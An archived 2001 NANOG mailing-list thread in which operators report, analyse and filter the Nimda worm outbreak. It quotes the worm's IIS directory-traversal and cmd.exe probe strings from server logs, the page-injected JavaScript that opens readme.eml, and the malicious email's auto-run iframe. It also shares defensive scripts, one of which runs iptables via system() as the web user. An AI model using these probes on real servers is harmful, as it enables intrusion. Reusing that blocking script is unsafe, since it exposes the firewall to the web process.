Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses. Is CodeRed or one of its relatives scheduled to start sweeping again today? We've never seen this level of traffic related to the NT worms. Even though we don't run any NT at all, we still have to suffer :( Kevin
On Tue, Sep 18, 2001 at 09:54:31AM -0400, sigma@pair.com said at one point in time:
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.
affirmative. i just looked at my logs, and it looks like each probe tries a bunch of things. i haven't seen much on the lists, but i'm looking right now. owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 "-" "-" owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 "-" "-" owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-" owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-" -- echo "send pgp key" | mail ravi@cow.org "It's like everybody's trying to find a reason for the shootings. Whatever happened to 'crazy?'" -- Chris Rock's explanation for the Littelton, CO., school shootings, quoted in The Dallas Morning News.
On Tue, 18 Sep 2001, ravi pina wrote:
On Tue, Sep 18, 2001 at 09:54:31AM -0400, sigma@pair.com said at one point in time:
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.
affirmative. i just looked at my logs, and it looks like each probe tries a bunch of things. i haven't seen much on the lists, but i'm looking right now.
i'm pretty sure that the worm's attack phase starts on the 20th (which of course, depends upon a correctly set system clock) and also that attempting to execute something like /scripts/root.ext/c++ something is involved. i think that cert's website would be a good place to look. i'm *not* a security/virus chick, but i did host a talk by marty linder of cert where he discected code red's activity and presented a summary. cert is of course, http://www.cert.org. deeann m.m. mikula director of operations telerama public access internet http://www.telerama.com 1.877.688.3200
ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this time of day, although still well short of capacity...apache server processor load is WAY up just from the requests, and the logs are growing like mad. On Tue, 18 Sep 2001, deeann mikula wrote:
On Tue, 18 Sep 2001, ravi pina wrote:
On Tue, Sep 18, 2001 at 09:54:31AM -0400, sigma@pair.com said at one point in time:
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.
affirmative. i just looked at my logs, and it looks like each probe tries a bunch of things. i haven't seen much on the lists, but i'm looking right now.
i'm pretty sure that the worm's attack phase starts on the 20th (which of course, depends upon a correctly set system clock) and also that attempting to execute something like /scripts/root.ext/c++ something is involved.
i think that cert's website would be a good place to look. i'm *not* a security/virus chick, but i did host a talk by marty linder of cert where he discected code red's activity and presented a summary.
cert is of course, http://www.cert.org.
deeann m.m. mikula
director of operations telerama public access internet http://www.telerama.com 1.877.688.3200
James Smallacombe PlantageNet, Inc. CEO and Janitor up@3.am http://3.am =========================================================================
We're also seeing a large increase in this activity. This seems to be more severe than the first time. Have an additional 30 to 40 meg inbound from this. Best regards, Bryan Heitman CommuniTech.Net, Inc. ----- Original Message ----- From: <up@3.am> To: <nanog@merit.edu> Sent: Tuesday, September 18, 2001 10:05 AM Subject: Re: Worm probes
ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this time of day, although still well short of capacity...apache server processor load is WAY up just from the requests, and the logs are growing like mad.
On Tue, 18 Sep 2001, deeann mikula wrote:
On Tue, 18 Sep 2001, ravi pina wrote:
On Tue, Sep 18, 2001 at 09:54:31AM -0400, sigma@pair.com said at one
point in time:
Has anyone else been seeing a dramatic increase in /scripts/.. NT
worm
probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.
affirmative. i just looked at my logs, and it looks like each probe tries a bunch of things. i haven't seen much on the lists, but i'm looking right now.
i'm pretty sure that the worm's attack phase starts on the 20th (which of course, depends upon a correctly set system clock) and also that attempting to execute something like /scripts/root.ext/c++ something is involved.
i think that cert's website would be a good place to look. i'm *not* a security/virus chick, but i did host a talk by marty linder of cert where he discected code red's activity and presented a summary.
cert is of course, http://www.cert.org.
deeann m.m. mikula
director of operations telerama public access internet http://www.telerama.com 1.877.688.3200
James Smallacombe PlantageNet, Inc. CEO and Janitor up@3.am http://3.am =========================================================================
On Tue, 18 Sep 2001 10:22:06 CDT, Bryan Heitman <bryanh@communitech.net> said:
We're also seeing a large increase in this activity. This seems to be more severe than the first time. Have an additional 30 to 40 meg inbound from this.
This seems to be the culprit: Concept Virus(CV) V.5, Copyright(C)2001 R.P.China I've nailed a copy, and am working on getting it to the right security people. A *PRELIMINARY* (eyeballing the output of 'strings' indicates that this one *both* sends itself via-email a la SirCam, *AND* scans for vulnerable web servers, and if it finds a vulnerable server, it causes anybody visiting that webpage to be offered a contaminated .exe as well. I do *NOT* have a handle on what malicious effects it has other than just propagating. This one's nasty, folks... -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China I've nailed a copy, and am working on getting it to the right security people. A *PRELIMINARY* (eyeballing the output of 'strings' indicates that this one *both* sends itself via-email a la SirCam, *AND* scans for vulnerable web servers, and if it finds a vulnerable server, it causes anybody visiting that webpage to be offered a contaminated .exe as well. I do *NOT* have a handle on what malicious effects it has other than just propagating.
I work at a large university and our security guys think this guy is what's been causing us problems all morning. Lots of subnet scans (tons of incomplete arps), CC Mail servers are wacking out, HPOV noting that old 3Com gear is dropping etc. This is what I've heard through the rumor mill (so take it with a grain of salt)... "...At first blush, it spreads itself via by web, email, and maybe shares. We've seen it spreading by a set of two HTTP requests. It will look for backdoors left behind by Code Red, such as /scripts/root.exe. It uses tftp to copy itself to the target machine then launches it via a second HTTP command." Eric :)
Folks, If anyone has a packet capture of the infection in progress, would you please contact me. I would like to get it to the some of the Cisco IOS folks ASAP. (Not my official job, but would like to help.) Thanks!! Michael Airhart At 11:54 AM 9/18/2001 -0400, Eric Gauthier wrote:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China I've nailed a copy, and am working on getting it to the right security people. A *PRELIMINARY* (eyeballing the output of 'strings' indicates that this one *both* sends itself via-email a la SirCam, *AND* scans for vulnerable web servers, and if it finds a vulnerable server, it causes anybody visiting that webpage to be offered a contaminated .exe as well. I do *NOT* have a handle on what malicious effects it has other than just propagating.
I work at a large university and our security guys think this guy is what's been causing us problems all morning. Lots of subnet scans (tons of incomplete arps), CC Mail servers are wacking out, HPOV noting that old 3Com gear is dropping etc. This is what I've heard through the rumor mill (so take it with a grain of salt)...
"...At first blush, it spreads itself via by web, email, and maybe shares. We've seen it spreading by a set of two HTTP requests. It will look for backdoors left behind by Code Red, such as /scripts/root.exe. It uses tftp to copy itself to the target machine then launches it via a second HTTP command."
Eric :)
-------------------------------------------------------------------------------------------------------- Michael Airhart 512/378-1246 Office Consulting Systems Engineer 413/480-1958 eFax Cisco Systems, Inc. 800/365-4578 Pager 12515 Research Blvd mairhart@cisco.com Austin, TX 78759
Appears that if it gets a 404 back from its intial unicode scans, it just keeps looking elsewhere. If the server responds with anything other than a 404 (such as a 403 IP Rejected, in this case...) It attempts to get the server to tftp a file named "admin.dll" from the scanning system. I pulled the admin.dll from an infected box and to my non-programming eyes, it appears to do at least the following (in no order): 1. Adds the guest account to the local Administrators group and then activates the account 2. Use the anonymous 3. Makes sure c$ is shared 4. Tries to mail a bunch of files. HELO it uses is aabbcc. <*** Might be able to use this for a quick and dirty IDS Sig***> 5. Looks like admin.dll ends up in "c", "d" and "e". 6. creates a file named readme.exe which is actually a wav file (weird?) I could be totally wrong here (and probably am) but oh well... Chris
indeed. scanning for strings that appear to be associated with the Concept Virus(CV) V.5, there is a tremendous increase in bandwidth usage. today alone i match: /scripts: 18013 /_vti_bin: 1885 _mem_bin: 1916 /ms_adc/: 1945 /winnt/system32: 27648 bugtraq is starting to get in the preliminary reports of this worm. beware that infected host's home pages contain a javascript that sends you to a page that attempts to send you a copy of the worm. fantastic, eh? -r On Tue, Sep 18, 2001 at 11:05:35AM -0400, up@3.am said at one point in time:
ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this time of day, although still well short of capacity...apache server processor load is WAY up just from the requests, and the logs are growing like mad.
On Tue, 18 Sep 2001, deeann mikula wrote:
On Tue, 18 Sep 2001, ravi pina wrote:
On Tue, Sep 18, 2001 at 09:54:31AM -0400, sigma@pair.com said at one point in time:
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.
affirmative. i just looked at my logs, and it looks like each probe tries a bunch of things. i haven't seen much on the lists, but i'm looking right now.
i'm pretty sure that the worm's attack phase starts on the 20th (which of course, depends upon a correctly set system clock) and also that attempting to execute something like /scripts/root.ext/c++ something is involved.
i think that cert's website would be a good place to look. i'm *not* a security/virus chick, but i did host a talk by marty linder of cert where he discected code red's activity and presented a summary.
cert is of course, http://www.cert.org.
deeann m.m. mikula
director of operations telerama public access internet http://www.telerama.com 1.877.688.3200
James Smallacombe PlantageNet, Inc. CEO and Janitor up@3.am http://3.am =========================================================================
-- echo "send pgp key" | mail ravi@cow.org ; ravi@happy:/home/ravi# rm -rf /bin/laden "Now I don't want you to worry, class. These tests will have no effect on your grades. They merely determine your future social status and financial success. If any." -- Mrs. Krabappel
This is new - it modifies the web pages of the infected machine to include a (I assume) virus. It adds this string to the web page: <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> Viewing infected web servers may be dangerous. Mark Radabaugh Amplex (419) 833-3635
Follow up... The web page on infected servers includes a script to send and open the file 'readme.exe' on windows machines. I do not know the details of when the executable does yet. Mark
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I just received this update from Sophos. Perhaps this is the virus that is spreading? === Tim ********************************************** Tim Winders, MCSE, CNE, CCNA Associate Dean of Information Technology South Plains College Levelland, TX 79336 Phone: 806-894-9611 x 2369 FAX: 806-894-1549 Email: TWinders@SPC.cc.tx.us ********************************************** Date: Tue, 18 Sep 2001 16:45:07 +0100 (BST) From: Sophos Alert System <listmaster@sophos.com> Reply-To: sophos-list-bounce@sophos.com To: Undisclosed recipients: ; Subject: Sophos Anti-Virus IDE alert: W32/Nimda-A Name: W32/Nimda-A Type: W32 executable file virus Date: 18 September 2001 A virus identity file (IDE) which provides protection is available now from our website and will be incorporated into the November 2001 (3.51) release of Sophos Anti-Virus. Sophos has received many reports of this virus from the wild. Description: W32/Nimda-A is an email-aware virus that spreads using an attached filename of README.EXE. Sophos researchers are continuing to examine the virus and will be posting a more detailed description of the virus on the Sophos website once the analysis is complete. Download the IDE file from http://www.sophos.com/downloads/ide/nimda-a.ide Read the analysis at http://www.sophos.com/virusinfo/analyses/w32nimdaa.html Download a ZIP file containing all the IDE files available for the current version of Sophos Anti-Virus from http://www.sophos.com/downloads/ide/ides.zip Read about how to use IDE files at http://www.sophos.com/downloads/ide/using.html To unsubscribe from this service please visit http://www.sophos.com/virusinfo/notifications On Tue, 18 Sep 2001, Mark Radabaugh - Amplex wrote:
Follow up...
The web page on infected servers includes a script to send and open the file 'readme.exe' on windows machines. I do not know the details of when the executable does yet.
Mark
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (OSF1) Comment: Made with pgp4pine 1.76 iEYEARECAAYFAjundQUACgkQTPuHnIooYby+TwCfQcCXMSbLg1K/kmVXC9tS8DRR e/AAn3wEKbB8Us2u2B39YBT5couH5EcE =VXKa -----END PGP SIGNATURE-----
I just got an e-mail with Subject: Central Command News for 09/14/2001 (Virus Update Notification) It had readme.exe attached to it. Obviously one should not open this. Time to create a new .procmail rule. On Tue, Sep 18, 2001 at 11:23:30AM -0500, Tim Winders wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
I just received this update from Sophos. Perhaps this is the virus that is spreading?
-- snip --
Description:
W32/Nimda-A is an email-aware virus that spreads using an attached filename of README.EXE.
Sophos researchers are continuing to examine the virus and will be posting a more detailed description of the virus on the Sophos website once the analysis is complete.
-- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine.
It is worse than that. The virus is passing it's self off as audio/x-wav; ----- Original Message ----- From: "Jim Seymour" Newsgroups: spamcop.geeks Sent: Tuesday, September 18, 2001 11:10 AM Subject: New Virus/Worm Email
I just received an interesting email. It made it past my virus filters, but a report on the NTBugTraq mailing list is reporting it as some kind of unknown worm that attacks IIS machines.
The message itself uses an attachment with a content type of audio/x-wav, but with a name of "readme.exe". I've got the security settings tightened down, but even so, Outlook Express asked me whether I wanted to open the embedded attachment.
Here is the email that I received (without the encoded attachment, of course). Note the long Subject line and the HTML iframe that refers to local content. Keep you eye on this one...
-- Jim Seymour
-----------------------------------------------------------------------
Received: from TGLNT (mail.tricongroup.com [206.206.91.131]) by mail.cipher.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id SVNKL1PC; Tue, 18 Sep 2001 08:15:28 -0700 From: <3dzvi51gehej@4ax.com> Subject:
Xtoprecvranalyzerdiskstrreadmec2supprttablecoltoprecvraps32analyzerdefaultus ergr
pcinforccidbutilappevent MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1
--====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p>
Slightly off-topic here...(I guess) I'm looking for anyone that is using Extreme Networks gear and that may be having difficulty with OSPF or STP. Please contact me off list... OT Flames encouraged! -- Richard Sena The MITRE Corporation e: rsena@mitre.org Lead Engineer 202 Burlington Road v: +1-781-271-3712 Dept: R10N; MS C020 Bedford, MA 01730-1420 f: +1-781-271-2600
On Tue, 18 Sep 2001, Jared Mauch wrote:
Time to create a new .procmail rule.
:0 B * >50000 * <90000 * ^Content-Type: audio/x-wav;$ name="readme.exe" VirusTrapHere ========================================================== Chris Candreva -- chris@westnet.com -- (914) 967-7816 WestNet Internet Services of Westchester http://www.westnet.com/
I protected against readme.exe specifically several weeks ago. I also proactively filter all incoming emails for executable attachments. [Begin sample] Regarding your message to x msgid=<x@x.x.net> You are receiving this message due to the fact a possible email attack was detected passing through our mail servers from you. This was probally due to a file attachment. As many of these attachements can run on their own we only allow harmless file types to be sent. If you wish to send this file anyway please use a compression program. If you have further questions please do not hesitate to give me a call at the number below. Bill Larson blarson@compu.net Network Administrator [Phone numbers here] REPORT: Trapped poisoned executable "readme.exe" REPORT: Not a document, or already poisoned by filename. Not scanned for macros. STATUS: Message quarantined, not delivered to recipient. -- Message sanitized on ns1.compu.net See http://www.impsec.org/email-tools/procmail-security.html for details. [End sample] Hopefully the notification does some good.
Along those lines, weren't there some projects last time around to find and clean up the affected machines? Clearly there are LOTS of vulnerable NT servers still out there. Presumably these are being responded to just like Smurf amplifiers, and the problem is just that the admins are clueless or unreachable? So far the most prolific network probing us has belonged to 9NetAve, which was bought by Concentric shortly before they became XO. Kevin
Hopefully the notification does some good.
On Tue, Sep 18, 2001 at 01:36:48PM -0400, sigma@pair.com wrote:
Along those lines, weren't there some projects last time around to find and clean up the affected machines? Clearly there are LOTS of vulnerable NT servers still out there. Presumably these are being responded to just like Smurf amplifiers, and the problem is just that the admins are clueless or unreachable?
So far the most prolific network probing us has belonged to 9NetAve, which was bought by Concentric shortly before they became XO.
I got so far about 205 unique IPs from the scans. If anyone is interested I can put them on a webpage. Or even put quickly a script with db in the back for other people to provide their list of IPs.
Kevin
Hopefully the notification does some good.
-- Regards, Ulf. --------------------------------------------------------------------- Ulf Zimmermann, 1525 Pacific Ave., Alameda, CA-94501, #: 510-865-0204
On Tue, 18 Sep 2001 13:36:48 EDT, sigma@pair.com said:
Along those lines, weren't there some projects last time around to find and clean up the affected machines? Clearly there are LOTS of vulnerable NT servers still out there. Presumably these are being responded to just like
This also has an e-mail vector and a web DOWNLOAD vector. There may be lots of vulnerable NT servers, but there's a lot MORE copies of Outlook and Internet Explorer out there. Think SirCam *AND* CodeRed *AND* the infect-a-surfer vector.... -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
We found the following on an infected server also: For each share on the server, it generates a .eml file and puts it in the root of the share. It then creates a index.asp, index.htm, default.asp and default.htm on the root of the share which points to and downloads the .eml file from the root of the share. Neat thing is, anyone with Active Desktop (View my Desktop as a Web Page) enabled is going to get it, presumably. Simply by browsing the shared directory. It looks like it morphs the .eml file names to. Not all are "readme.eml", althought they all are ~ 79K in size. Happy disinfecting. My customer on the end of a 56K FR link was fsck'd this afternoon. Welcome to IT during the first war fo the 21st century ... Eric ========================================================================== Eric Germann CCTec ekgermann@cctec.com Van Wert OH 45801 http://www.cctec.com Ph: 419 968 2640 Fax: 603 825 5893 "It is so easy to miss pretty trivial solutions to problems deemed complicated. The goal of a scientist is to find an interesting problem, and live off it for a while. The goal of an engineer is to evade interesting problems :)" -- Vadim Antonov <avg@kotovnik.com> on NANOG
-----Original Message----- From: owner-nanog@merit.edu [mailto:owner-nanog@merit.edu]On Behalf Of Valdis.Kletnieks@vt.edu Sent: Tuesday, September 18, 2001 2:34 PM To: sigma@pair.com Cc: nanog@merit.edu Subject: Re: Worm probes
On Tue, 18 Sep 2001 13:36:48 EDT, sigma@pair.com said:
Along those lines, weren't there some projects last time around to find and clean up the affected machines? Clearly there are LOTS of vulnerable NT servers still out there. Presumably these are being responded to just like
This also has an e-mail vector and a web DOWNLOAD vector.
There may be lots of vulnerable NT servers, but there's a lot MORE copies of Outlook and Internet Explorer out there.
Think SirCam *AND* CodeRed *AND* the infect-a-surfer vector.... -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
well good grief unfortunately code red is using all our disk space at the moment. (how inconsiderate of the perpetators) if anyone is in position to donate/lend a 7-10TB RAID to caida to capture better (more) data for these things, plz let me know. (hey, tax writeoff or just lend us inventory you can't get rid of this quarter anyway) given what this code-rainbow stuff is doing to people's apache logs as well, i have to wonder if the worm authors are trading in options on EMC, etc. yeesh pathetic new [technology + same] world in so many ways
On Tue, Sep 18, 2001 at 11:05:35AM -0400, up@3.am wrote:
ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this time of day, although still well short of capacity...apache server processor load is WAY up just from the requests, and the logs are growing like mad.
I'm sitting behind a dialup box right now, and I just added a log clause to an ipf rule matching connection attempts to port 80. I'm averaging 35 probes per minute. Blocking them is quite beneficial to performance on a v.34 connection :) Joe
At 09:54 AM 9/18/01, sigma@pair.com wrote:
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.
Is CodeRed or one of its relatives scheduled to start sweeping again today? We've never seen this level of traffic related to the NT worms. Even though we don't run any NT at all, we still have to suffer :(
First ones appeared today, and so far I see 17650 attempts on just one of my servers. We don't run any Microsoft stuff either, but that doesn't keep our servers from getting hammered... ----------------------------------------------------------------- Daniel Senie dts@senie.com Amaranth Networks Inc. http://www.amaranth.com
Yes, I saw... I just contact our local NIC security guys and they told me that there are two new worms. One is exploiting the backdoors left by codered 2, and another worm is (possible) a "codered 3", which is defacing the web pages with anti-chinese and anti-poisonbox messages... Today is the day... :-(((( On Tue, 18 Sep 2001 sigma@pair.com wrote:
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.
Is CodeRed or one of its relatives scheduled to start sweeping again today? We've never seen this level of traffic related to the NT worms. Even though we don't run any NT at all, we still have to suffer :(
Kevin
spc> Has anyone else been seeing a dramatic increase in /scripts/.. NT worm spc> probes this morning? We're seeing about 8000/second, starting around 9:15 Yes. We are seeing it here bigtime. Does anyone have any apache hacks to lessen the impact? One idea: Once a probe is sent, the prober's IP# is stored in a hash (perhaps in shared memory or a mmap'd file that all children can share) and new connections from that IP are no longer accepted. thanks, -joe
At 12:51 PM 9/18/01, Joseph McDonald wrote:
spc> Has anyone else been seeing a dramatic increase in /scripts/.. NT worm spc> probes this morning? We're seeing about 8000/second, starting around 9:15
Yes. We are seeing it here bigtime. Does anyone have any apache hacks to lessen the impact? One idea: Once a probe is sent, the prober's IP# is stored in a hash (perhaps in shared memory or a mmap'd file that all children can share) and new connections from that IP are no longer accepted.
Or better: script which causes a filter rule to be added to ipchains list, blocking all ports. ----------------------------------------------------------------- Daniel Senie dts@senie.com Amaranth Networks Inc. http://www.amaranth.com
On Tue, 18 Sep 2001, Joseph McDonald wrote:
spc> Has anyone else been seeing a dramatic increase in /scripts/.. NT worm spc> probes this morning? We're seeing about 8000/second, starting around 9:15
Yes. We are seeing it here bigtime. Does anyone have any apache hacks to lessen the impact? One idea: Once a probe is sent, the prober's IP# is stored in a hash (perhaps in shared memory or a mmap'd file that all children can share) and new connections from that IP are no longer accepted.
<--( SNIP )--> That would still allow the malicious network traffic to traverse your network. I'm not seeing more than about 60 unique hosts that are scanning ( YMMV ), so that isn't a huge hit for me ACL-wise ( again YMMV ). Your choice, let them bang on your router or your web servers. Depends on your situation. .z
On Tue, 18 Sep 2001, Joseph McDonald wrote:
Yes. We are seeing it here bigtime. Does anyone have any apache hacks to lessen the impact? One idea: Once a probe is sent, the prober's IP# is stored in a hash (perhaps in shared memory or a mmap'd file that all children can share) and new connections from that IP are no longer accepted.
Or what about this: redirect your 404 to a PHP script with something like: ErrorDocument 404 /404.php and then let a script like this waste the attacker's time: <? echo "404 This page is not available.\n"; flush(); sleep(150); ?> This should slow the scanning and thus the waste of bandwidth and spread rate of the infections down. At least, if the worm is single threaded. Iljitsch van Beijnum
I'm gonna suggest this one more time: LaBrea, from http://www.threenorth.com/LaBrea should make these attacks slow down like they're wading through molasses. Now, if most or all ISPs installed tarpits like this it would seriously reduce the virulence of the attacks. Just my $0.02 worth. David Leonard ShaysNet On Tue, 18 Sep 2001, Iljitsch van Beijnum wrote:
On Tue, 18 Sep 2001, Joseph McDonald wrote:
Yes. We are seeing it here bigtime. Does anyone have any apache hacks to lessen the impact? One idea: Once a probe is sent, the prober's IP# is stored in a hash (perhaps in shared memory or a mmap'd file that all children can share) and new connections from that IP are no longer accepted.
Or what about this: redirect your 404 to a PHP script with something like:
ErrorDocument 404 /404.php
and then let a script like this waste the attacker's time:
<? echo "404 This page is not available.\n"; flush(); sleep(150); ?>
This should slow the scanning and thus the waste of bandwidth and spread rate of the infections down. At least, if the worm is single threaded.
Iljitsch van Beijnum
should make these attacks slow down like they're wading through molasses. Now, if most or all ISPs installed tarpits like this it would seriously reduce the virulence of the attacks.
Actually, if most or all ISPs installed tarpits like this, it would lead exploit developers to implement timeouts that would quickly kill off connection attempts that were progressing at the expected rate. -- Brett
On Tue, Sep 18, 2001 at 09:51:43AM -0700, Joseph McDonald wrote:
One idea: Once a probe is sent, the prober's IP# is stored in a hash (perhaps in shared memory or a mmap'd file that all children can share) and new connections from that IP are no longer accepted.
Better yet, set a host route for them with next hop set to 127.0.0.1. That assumes that you don't want infected hosts talking to your host at all. -- Jeff Gehlbach, Concord Communications <jgehlbach@concord.com> Senior Professional Services Consultant, Atlanta ph. 770.384.0184 fax 770.384.0183
Hello Joseph, Tuesday, September 18, 2001, 11:51:43 AM, you wrote: JM> Yes. We are seeing it here bigtime. Does anyone have any apache hacks JM> to lessen the impact? One idea: Once a probe is sent, the prober's JM> IP# is stored in a hash (perhaps in shared memory or a mmap'd file JM> that all children can share) and new connections from that IP are no JM> longer accepted. Here's a possibility but I need help with one aspect: A) create a rule in your apache httpd.conf like this: <Location /scripts/root.exe> Deny from all ErrorDocument 404 http://www.everydns.net/blockip.php </Location> B) create blockip.php (or use perl or whatever[read: python]) <? $iptables = '/usr/local/sbin/iptables'; $ip = $REMOTE_ADDR; $blockline = $iptables." -A INPUT -s ".$ip." -p all -j DROP;"; system($blockline); ?> C) the caveat here is that you need to give the webuser (nobody) access to iptables. This can be done in sudo like this: nobody ALL=NOBODY: /usr/local/sbin/iptables The MAJOR problem is that you have now given your entire web site access to iptables. If you have a machine which has no "users" then this may be okay for you however for most of us it is not. Do any of you have a way to call a perl script directly from the httpd.conf entry and perhaps pass the REMOTE_ADDR to it? I know there's a way and I'll look for it, but in the meantime -- any ideas? Thanks, David Ulevitch mailto:davidu@everydns.net
Look into the Apache::CodeRed module. I'm sure that can be hacked up to do what you need. /nick On Tue, 18 Sep 2001, David Ulevitch wrote:
Hello Joseph,
Tuesday, September 18, 2001, 11:51:43 AM, you wrote:
JM> Yes. We are seeing it here bigtime. Does anyone have any apache hacks JM> to lessen the impact? One idea: Once a probe is sent, the prober's JM> IP# is stored in a hash (perhaps in shared memory or a mmap'd file JM> that all children can share) and new connections from that IP are no JM> longer accepted.
Here's a possibility but I need help with one aspect:
A) create a rule in your apache httpd.conf like this:
<Location /scripts/root.exe> Deny from all ErrorDocument 404 http://www.everydns.net/blockip.php </Location>
B) create blockip.php (or use perl or whatever[read: python]) <? $iptables = '/usr/local/sbin/iptables'; $ip = $REMOTE_ADDR; $blockline = $iptables." -A INPUT -s ".$ip." -p all -j DROP;"; system($blockline); ?>
C) the caveat here is that you need to give the webuser (nobody) access to iptables. This can be done in sudo like this: nobody ALL=NOBODY: /usr/local/sbin/iptables
The MAJOR problem is that you have now given your entire web site access to iptables. If you have a machine which has no "users" then this may be okay for you however for most of us it is not. Do any of you have a way to call a perl script directly from the httpd.conf entry and perhaps pass the REMOTE_ADDR to it? I know there's a way and I'll look for it, but in the meantime -- any ideas?
Thanks, David Ulevitch mailto:davidu@everydns.net
Hi David Why not use Labrea (developed originally to tarpit CodeRed) ? <http://www.hackbusters.net/LaBrea/> - Rafi On Tue, 18 Sep 2001, David Ulevitch wrote:
Hello Joseph,
Tuesday, September 18, 2001, 11:51:43 AM, you wrote:
JM> Yes. We are seeing it here bigtime. Does anyone have any apache hacks JM> to lessen the impact? One idea: Once a probe is sent, the prober's JM> IP# is stored in a hash (perhaps in shared memory or a mmap'd file JM> that all children can share) and new connections from that IP are no JM> longer accepted.
Here's a possibility but I need help with one aspect:
A) create a rule in your apache httpd.conf like this:
<Location /scripts/root.exe> Deny from all ErrorDocument 404 http://www.everydns.net/blockip.php </Location>
B) create blockip.php (or use perl or whatever[read: python]) <? $iptables = '/usr/local/sbin/iptables'; $ip = $REMOTE_ADDR; $blockline = $iptables." -A INPUT -s ".$ip." -p all -j DROP;"; system($blockline); ?>
C) the caveat here is that you need to give the webuser (nobody) access to iptables. This can be done in sudo like this: nobody ALL=NOBODY: /usr/local/sbin/iptables
The MAJOR problem is that you have now given your entire web site access to iptables. If you have a machine which has no "users" then this may be okay for you however for most of us it is not. Do any of you have a way to call a perl script directly from the httpd.conf entry and perhaps pass the REMOTE_ADDR to it? I know there's a way and I'll look for it, but in the meantime -- any ideas?
